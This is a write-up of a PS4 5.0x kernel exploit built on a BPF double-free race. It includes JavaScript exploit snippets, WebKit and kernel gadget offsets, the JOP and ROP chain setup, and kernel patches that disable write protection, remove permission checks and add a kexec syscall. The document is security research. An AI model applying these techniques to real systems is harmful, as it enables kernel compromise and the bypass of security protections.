Note: Similar to 4.55, this bug is interesting primarily for exploitation on the PS4, but it can also be used on other systems using the Berkeley Packet Filter VM if the attacker has sufficient permissions, so it's been published under the "FreeBSD" folder.
If you found any mistakes or have suggestions to improve clarity on some points, either open an issue on this repo or reply them to this tweet. Thanks :)
Welcome to the 5.0x kernel exploit write-up. A few months ago, a kernel vulnerability was discovered by qwertyoruiopz and an exploit was released for BPF which involved crafting an out-of-bounds (OOB) write via use-after-free (UAF) due to the lack of proper locking. It was a fun bug, and a very trivial exploit. Sony then removed the write functionality from BPF, so that exploit was patched. However, the core issue still remained (being the lack of locking). A very similar race condition still exists in BPF past 4.55, which we will go into detail below on. The full source of the exploit can be found here.
This bug is no longer accessible however past 5.05 firmware, because the BPF driver has finally been blocked from unprivileged processes - WebKit can no longer open it.
Sony also introduced a new security mitigation in 5.0x firmwares to prevent the stack pointer from pointing into user space, however we'll go more in detail on this a bit further down.
Some assumptions are made of the reader's knowledge for the writeup. The avid reader should have a basic understanding of how memory allocators work - more specifically, how malloc() and free() allocate and deallocate memory respectively. They should also be aware that devices can be issued commands concurrently, as in, one command could be received while another one is being processed via threading. An understanding of C, x86, and exploitation basics is also very helpful, though not necessarily required.
This section contains some helpful information to those newer to exploitation, or are unfamiliar with device drivers, or various exploit techniques such as heap spraying and race conditions. Feel free to skip to the "A Tale of Two Free()'s" section if you're already familiar with this material.
There are a few ways that applications can directly communicate with the operating system. One of which is system calls, which there are over 600 of in the PS4 kernel, ~500 of which are FreeBSD - the rest are Sony-implemented. Another method is through something called "Device Drivers". Drivers are typically used to bridge the gap between software and hardware devices (usb drives, keyboard/mouse, webcams, etc) - though they can also be used just for software purposes.
There are a few operations that a userland application can perform on a driver (if it has sufficient permissions) to interface with it after opening it. In some instances, one can read from it, write to it, or in some cases, issue more complex commands to it via the ioctl()
system call. The handlers for these commands are implemented in kernel space - this is important, because any bugs that could be exploited in an ioctl handler can be used as a privilege escalation straight to ring0 - typically the most privileged state.
Drivers are often the more weaker points of an operating system for attackers, because sometimes these drivers are written by developers who don't understand how the kernel works, or the drivers are older and thus not wise to newer attack methods.
If we take a look around inside of WebKit's sandbox, we'll find a /dev
directory. While this may seem like the root device driver path, it's a lie. Many of the drivers that the PS4 has are not exposed to this directory, but rather only ones that are needed for WebKit's operation (for the most part). For some reason though, BPF (aka. the "Berkeley Packet Filter") device is not only exposed to WebKit's sandbox - it also has the privileges to open the device as R/W. This is very odd, because on most systems this driver is root-only (and for good reason). If you want to read more into this, refer to my previous write-up with 4.55FW.
Below is an excerpt from the 4.55 bpfwrite writeup.
Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by bpf_filter()
(which are ran when packets are received). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside it's buffer. Breaking down the BPF VM in it's entirety is far beyond the scope of this write-up, just know that the code produced by it is ran in kernel mode - this is why read/write access to /dev/bpf
should be privileged.
You can reference the opcodes that the BPF VM takes here.
Race conditions occur when two processes/threads try to access a shared resource at the same time without mutual exclusion. The problem was ultimately solved by introducing concepts such as the "mutex" or "lock". The idea is when one thread/process tries to access a resource, it will first acquire a lock, access it, then unlock it once it's finished. If another thread/process tries to access it while the other has the lock, it will wait until the other thread is finished. This works fairly well - when it's used properly.
Locking is hard to get right, especially when you try to implement fine-grained locking for performance. One single instruction or line of code outside the locking window could introduce a race condition. Not all race conditions are exploitable, but some are (such as this one) - and they can give an attacker very powerful bugs to work with.
The process of heap spraying is fairly simple - allocate a bunch of memory and fill it with controlled data in a loop and pray your allocation doesn't get stolen from underneath you. It's a very useful technique when exploiting something such as a use-after-free(), as you can use it to get controlled data into your target object's backing memory.
By extension, it's useful to do this for a double free() as well, because once we have a stale reference, we can use a heap spray to control the data. Since the object will be marked "free" - the allocator will eventually provide us with control over this memory, even though something else is still using it. That is, unless, something else has already stolen the pointer from you and corrupts it - then you'll likely get a system crash, and that's no fun. This is one factor that adds to the variance of exploits, and typically, the smaller the object, the more likely this is to happen.
Via ioctl()
command, a user can set a filter program on a given descriptor via commands such as BIOSETWF
. There are other commands to set other filters, however the write filter is the only one interesting to us for this writeup. An important part of the previous exploit was the power to free() an older filter once a new one has been allocated, via bpf_setf()
, which is called directly by BIOSETWF
's command handler. This allowed us to free() a filter while it was in use. This free() in itself is also a bug that can be exploited, and is leveraged in the newer exploit. Let's take a look at bpf_setf()
again.
static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd)
{
struct bpf_insn *fcode, *old;
// ...
if (cmd == BIOCSETWF) {
old = d->bd_wfilter; // <----- THIS ISN'T LOCKED :)
wfilter = 1;
}
// ...
if (fp->bf_insns == NULL) {
// ...
BPFD_LOCK(d);
// ...
BPFD_UNLOCK(d);
if (old != NULL)
free((caddr_t)old, M_BPF);
return (0);
}
// ...
}
We can see that there are variables on the stack to hold filter pointers, including one for the old
filter which eventually gets free()'d. If the ioctl command is set to BIOSETWF
, the pointer from d->bd_wfilter
is copied to the old
stack variable.
Later on, we can see that they lock the BPF descriptor, and null the references to the filters. They lock the reference clearing, but what about the pointer of d->bd_wfilter
being copied to the stack? As we've seen in previous exploits, multiple threads can run and use the same bpf_d
object. If we were to race setting two filters in parallel, there's a chance that both threads will copy the same pointer to their kernel stacks, eventually resulting in a double free as both pointers will be processed.
With a double free() primitive, we have the ability to achieve memory corruption on the kernel heap by poisoning the memory allocator. This essentially allows us to create a targetted use-after-free() (UAF) on an object allocated post-corruption.
Similar to 1.76, the target object for this exploit that was used was the knote
object. kqueue
objects represent event queues for raising these events. knote
lists are managed by the kqueue
they are in. The knote
object is used to represent a kernel event in memory, and are linked together by a singly linked list. Qwerty chose knote
because of knote lists (called knlist
), as it gives us some degree of control of the size. Let's take a look at the structure (macros have been ommited for brevity sake).
struct knote {
SLIST_ENTRY(knote) kn_link; /* for kq */
SLIST_ENTRY(knote) kn_selnext; /* for struct selinfo */
struct knlist *kn_knlist; /* f_attach populated */
TAILQ_ENTRY(knote) kn_tqe;
struct kqueue *kn_kq; /* which queue we are on */
struct kevent kn_kevent;
int kn_status; /* protected by kq lock */
int kn_sfflags; /* saved filter flags */
intptr_t kn_sdata; /* saved data field */
union {
struct file *p_fp; /* file data pointer */
struct proc *p_proc; /* proc pointer */
struct aiocblist *p_aio; /* AIO job pointer */
struct aioliojob *p_lio; /* LIO job pointer */
} kn_ptr;
struct filterops *kn_fop; // <--- Of interest as an attacker, offset: 0x68
void *kn_hook;
int kn_hookid;
};
There's an interesting field there, struct filterops *kn_fop
at offset 0x68. This is essentially a table of function pointers that is referenced when something happens with the event, such as an attach or detach. The f_detach
function pointer will be dereferenced and called when the kqueue
and by extension the knote
is being destroyed.
struct filterops {
int f_isfd;
int (*f_attach)(struct knote *kn);
void (*f_detach)(struct knote *kn);
int (*f_event)(struct knote *kn, long hint);
void (*f_touch)(struct knote *kn, struct kevent *kev, u_long type);
};
By corrupting the f_detach
function pointer, hijacking of the instruction pointer and thus arbitrary code execution can be achieved when the object is destroyed via the destruction of the corrupted kqueue
.
Our exploit strategy is targetting a UAF on the knote
object to hijack the instruction pointer. Let's break down the steps/stages for successful exploitation.
- Open BPF descriptors, setup one NOP filter and one filter for heap spraying
- Setup the fake
knote
object in WebKit's heap for JOP. - Setup the kernel ROP chain
- Start thread one
- Start thread two
Thread 1 will do the following actions:
- Create a kqueue via
sys_kqueue()
- Set a filter on the device in an attempt to poison the allocator
- Trigger a kevent
- Perform a heap spray in an attempt to achieve memory corruption
- Close the kqueue (attempt to achieve code execution)
Thread 2 will simply continously attempt to set a write filter.
At some point in 5.0x, it seems Sony added some mitigation into the scheduler to check the stack pointer against userland addresses when running in kernel context, similar to the increasingly common "Supervisor Mode Access Prevention" (SMAP) mitigation found on modern systems. This turned an otherwise fairly trivial exploit into some complex kernel memory manipulation to run a kernel ROP (kROP) chain. To my knowledge this hasn't been investigated very much, but attempting a simple stack pivot like we've done in previous exploits into userland memory will crash the kernel.
To avoid this, we need to get our ROP chain into kernel memory. To do this, qwerty decided to go with the method he used on the iPhone 7 - essentially using JOP to push a bunch of stack frames onto the kernel stack, and memcpy()
'ing the chain into RSP
.
You can find a detailed annotation of the exploit here to assist in understanding it, as it does get quite complex.
Software engineers have started getting wise to stack pivot techniques, and preventing the attacker from the ability to stack pivot into user-controlled memory is a pretty decent counter-measure, however, like everything, it is bypassable. JOP (jump oriented programming) is a way. You could use JOP to implement a full chain, or use it as a method of getting to ROP via getting your ROP chain into kernel memory. The latter is preferred, because implementing logic in JOP (while possible) can be a nightmare.
Return Oriented Programming (ROP) is essentially the process of creating a fake stack and pushing the address of gadgets to it, and pivotting RSP to it. Your chain of gadgets is then executed like a real callstack, and every time the ret
instruction is hit, the next gadget in the chain is run.
Jump Oriented Programming (JOP) works a bit differently. Instead of ending your gadgets with a ret
instruction, you end your gadgets with a jmp
instruction. As long as you control the destination (maybe there's a register you can influence the value of), you can chain it with other gadgets, without the need of using a fake stack. For instance, if you control the value of rax
, your gadget can end with jmp rax
. By setting the value of rax
to the address of the next gadget, you can chain them.
With JOP you generally have to get more creative, because you're even more limited on potential gadgets - this is why implementing full chains in JOP is not preferred.
Now that we've covered the basics of what the exploit is and the basics of JOP, we'll start through the process of exploiting the bug. The first thing we need to do is setup a fake knote
object to spray the heap with. Luckily, faking this object is easy, there's no need to fake a bunch of members for stability, we only need to fake a few members along with kn_fops
, our target object. The ctxp
buffer is used to setup our fake knote
.
var ctxp = p.malloc32(0x2000); // ctxp = knote
p.write8(ctxp.add32(0), ctxp2); // 0x00 = kn_link - not important for kqueue per se, but for the JOP gadget
p.write8(ctxp.add32(0x50), 0); // 0x50 = kn_status = 0 (clear flags so detach is called)
p.write8(ctxp.add32(0x68), ctxp1); // 0x68 = kn_fops
Notice that we've set kn_fops
to ctxp1
- this is the buffer for the fake kn_fops
function table. The only thing we need to fake in this table is kn_fops->f_detach()
, because this is the only function that will be called on kqueue destruction.
var ctxp1 = p.malloc32(0x2000); // ctxp1 = knote->kn_fops
p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // JOP gadget
As you can see, this is where we achieve arbitrary code execution, and we're directing RIP to 0x12A19CD
in WebKit. Here's an x86 snippet of the relevant code for kqueue_close()
- where control of the instruction pointer is achieved.
; Note: R14 = ctxp
seg000:FFFFFFFF89D29861 test byte ptr [r14+50h], 8 ; we set ctxp+0x50 to 0, so we're good
seg000:FFFFFFFF89D29866 jnz short loc_FFFFFFFF89D29872 ; irrelevant
seg000:FFFFFFFF89D29868 mov rax, [r14+68h] ; r14 + 0x68 = ctxp1
seg000:FFFFFFFF89D2986C mov rdi, r14 ; r14 + 0x00 = ctxp2 = rdi
seg000:FFFFFFFF89D2986F call qword ptr [rax+10h] ; JOP gadget
Also notice that we control the rdi
register here via the r14
register. Under normal circumstances, the knote object kn
is loaded into rdi
as it's the first argument to kn->kn_fop->f_detach()
- however because we have corruption on the knote
- we can not only control where we jump to, but also the arguments. This is important for JOP, because the next jump in the first JOP gadget requires us to have control of the RDI register.
To push some space on the stack, we can use a JOP chain. We'll use the variable stackshift_from_retaddr
to track how much we've pushed on the stack. First we'll run a function prologue, which will subtract from RSP, creating space for us to put our ROP chain into. This function prologue is our first JOP gadget at 0x12A19CD
, which we setup previously in our fake knote
that we sprayed.
seg000:00000000012A19CD sub rsp, 58h
seg000:00000000012A19D1 mov [rbp-2Ch], edx
seg000:00000000012A19D4 mov r13, rdi
seg000:00000000012A19D7 mov r15, rsi
seg000:00000000012A19DA mov rax, [r13+0]
seg000:00000000012A19DE call qword ptr [rax+7D0h] // Implicitly subs 0x8 from rsp
At this point, we're 0x5C away from the original stack pointer. Now remember, for JOP to work, we need to be able to control where code jumps next, which means we have to control rax
. Luckily, we can see rax
is loaded from r13+0
, and r13
is set from rdi
. As detailed above, we have corruption on rdi
via the knote
object. If we look at the previous section where the JOP gadget is called from the kernel, we set rdi
to be ctxp2
. The next gadget will be called at ctxp2 + 0x7D0
, which we will set to 0x6EF4E5
.
p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5));
seg000:00000000006EF4E5 mov rdi, [rdi+10h]
seg000:00000000006EF4E9 jmp qword ptr [rax]
This gadget will allow us to set rdi
to a new value, and jump to rax
, which is still equivalent to the address of ctxp2
. Notice that this gadget allows us to loop, because we can write the first gadget to ctxp2
, and set where the first gadget jumps to via rdi + 0x10
.
var iterbase = ctxp2;
for (var i = 0; i < 0xf; i++) { // loop 15 times
p.write8(iterbase, offsetToWebKit(0x12A19CD)); // first JOP gadget
stackshift_from_retaddr += 8
p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // second JOP gadget
p.write8(iterbase.add32(8), iterbase.add32(0x20));
p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
iterbase = iterbase.add32(0x20); // setup next loop
}
Now that we've created space on the stack, we want to copy our kernel ROP chain into it to get executed. Let's take a look at memcpy()'s function signature:
void *memcpy(void *destination, const void *source, size_t num);
As defined in the x64 ABI (Application Binary Interface) - the following registers are used to pass arguments to functions:
rdi - first argument
rsi - second argument
rdx - third argument
rcx - fourth argument
r8 - fifth argument
r9 - sixth argument
[stack] - seven+ arguments
Therefore, the following registers are interesting to us for this memcpy call:
rdi (memory destination pointer)
rsi (memory source pointer)
rdx (size in bytes)
The first thing we'll do is load RDX for the size. We can do this via another JOP gadget in WebKit at 0x15CA41B
.
seg000:00000000015CA41B mov rdx, [rdi+0B0h]
seg000:00000000015CA422 call qword ptr [rdi+70h]
We can write relative to RDI via the rdibase
variable. By adding our shift plus 0x28 (offset for where we're writing on the stack), we can load RDX with our chain length.
Next we'll load the source pointer in RSI. We want this to point to where we're writing our kernel ROP chain in userland. Similar to when we set the size, we'll again look for a JOP gadget that can set RSI from memory relative to RDI. WebKit at 0x1284834
does the trick.
seg000:0000000001284834 mov rsi, [rdi+8]
seg000:0000000001284838 mov rdi, [rdi+18h]
seg000:000000000128483C mov rax, [rdi]
seg000:000000000128483F call qword ptr [rax+30h]
Finally, we need to setup RDI so that it points to all of our fake stack frames that we pushed on the kernel stack. This turns out to be at RBP (base pointer) - 0x28. We can use another JOP gadget at 0x272961
.
seg000:0000000000272961 lea rdi, [rbp-28h]
seg000:0000000000272965 call qword ptr [rax+40h]
Now that the arguments are setup, we need to call memcpy()
. Notice from our last JOP gadget, that the next place we jump to is setup based on [rax + 0x40]
. This is where we want to write the address of memcpy()
from userland. We'll skip the function prologue and optimizations to avoid side-effects produced from our previous JOP gadgets.
p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90)); // skip prolog covering side effecting branch and skipping optimizations
var topofchain = stackshift_from_retaddr + 0x28;
p.write8(rdibase.add32(0xB0), topofchain);
It was suggested to me that I should include a section containing some details on complications that occured. We've already detailed one of them, being the SMAP-like implementation, however another was the lack of debugging. At this point in time, we didn't have a kernel debugging framework setup for working with the PS4. We did however have the ability to patch the kernel to enable UART and "verbose panic" information if we have an existing kernel exploit working. Of course though, once the system reboots, we no longer have access to UART nor verbose panic info even if we did.
Panic information that's printed to the klog/UART can be a very helpful tool for debugging exploits (which is probably why Sony has it disabled in the first place). Below is an example of a standard page fault panic from klog:
Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 01
fault virtual address = 0xffffde1704254000
fault code = supervisor read instruction, protection violation
instruction pointer = 0x20:0xffffde1704254000
stack pointer = 0x28:0xffffff807119b220
frame pointer = 0x28:0xffffff807119b2b0
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, long 1, def32 0, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = 87 (infloopThr)
As you can see, some information here is extremely useful, especially the virtual address and the instruction pointer.
This information is fantastic when the system actually gives it to us. However, there are some cases where the system won't. Often this seems to be because the crash happens in a critical section, such as inside free() directly. For more information on critical sections, see Critical Sections.
Other times, the reason we don't get this information is unknown. If the panic information is unobtainable for us because we either don't have an existing exploit or the information just won't get printed to the klog, other tricks must be used, such as using infloop gadgets and other "hacky" exploit debugging techniques.
Now that we have the ability to run kernel ROP chains due to our stack manipulation sorcery described in the last section, we can apply kernel patches after we disable kernel write protection via the cr0
register. We can do this by just flipping the write-protection bit at bit 16.
krop.push(window.gadgets["pop rsi"]);
krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
krop.push(window.gadgets["and rax, rsi"]);
krop.push(window.gadgets["mov rdx, rax"]);
For brevity's sake, I won't cover all the patches in detail, however here's a brief recap of the patches made in the ROP chain.
sys_setuid syscall - remove permission check
sys_mmap syscall - allow RWX mapping
amd64_syscall - syscall instruction allowed anywhere
sys_dynlib_dlsym syscall - allow dynamic resolving from anywhere
The main goal of the chain is to install our own system call called kexec
. This will allow us to execute arbitrary code in kernel mode easily from any application, no matter the privileges.
sys_kexec(void *code, void *uap);
Code such as jailbreaking and HEN are ran via kexec
. Installing it is fairly easy, we just have to add an entry into sysent.
struct sysent { /* system call table */
int sy_narg; /* number of arguments */
sy_call_t *sy_call; /* implementing function */
au_event_t sy_auevent; /* audit event associated with syscall */
systrace_args_func_t sy_systrace_args_func;
/* optional argument conversion function. */
u_int32_t sy_entry; /* DTrace entry ID for systrace. */
u_int32_t sy_return; /* DTrace return ID for systrace. */
u_int32_t sy_flags; /* General flags for system calls. */
u_int32_t sy_thrcnt;
};
By setting sy_call
to a jmp qword ptr [rsi]
gadget (which can be found in the kernel at offset 0x13460
), sy_narg
to 2
, and sy_flags
to SY_THR_STATIC
(100000000
), we can successfully insert a custom system call that executes code in ring0.
seg000:FFFFFFFF8AC38820 dq 2 ; Syscall #11
seg000:FFFFFFFF8AC38828 dq 0FFFFFFFF89BCF460h
seg000:FFFFFFFF8AC38830 dq 0
seg000:FFFFFFFF8AC38838 dq 0
seg000:FFFFFFFF8AC38840 dq 0
seg000:FFFFFFFF8AC38848 dq 100000000h
Again, not a real patch, but a Sony patch - though this time more effective. Opening BPF has been blocked for unprivileged processes such as WebKit and other apps/games. It's still present in the sandbox, however attempting to open it will fail and yield EPERM.
Another cool bug to exploit. It should have been a trivial exploit, however Sony's new mitigation that prevents exploit devs from pivotting RSP into userland memory while in kernel context is quite effective, and some tricks had to be used to get the chain into kernel memory - but as demonstrated, it is beatable. This exploit is also a good example of how double free()'s can be exploited fairly easily on FreeBSD if they're on an object of decent size.
TheFloW - Suggestions and Feedback
qwertyoruiopz : Detailed Annotation
qwertyoruiopz : Zero2Ring0 Slides
Watson FreeBSD Kernel Cross Reference
Marco Ramilli : From ROP to JOP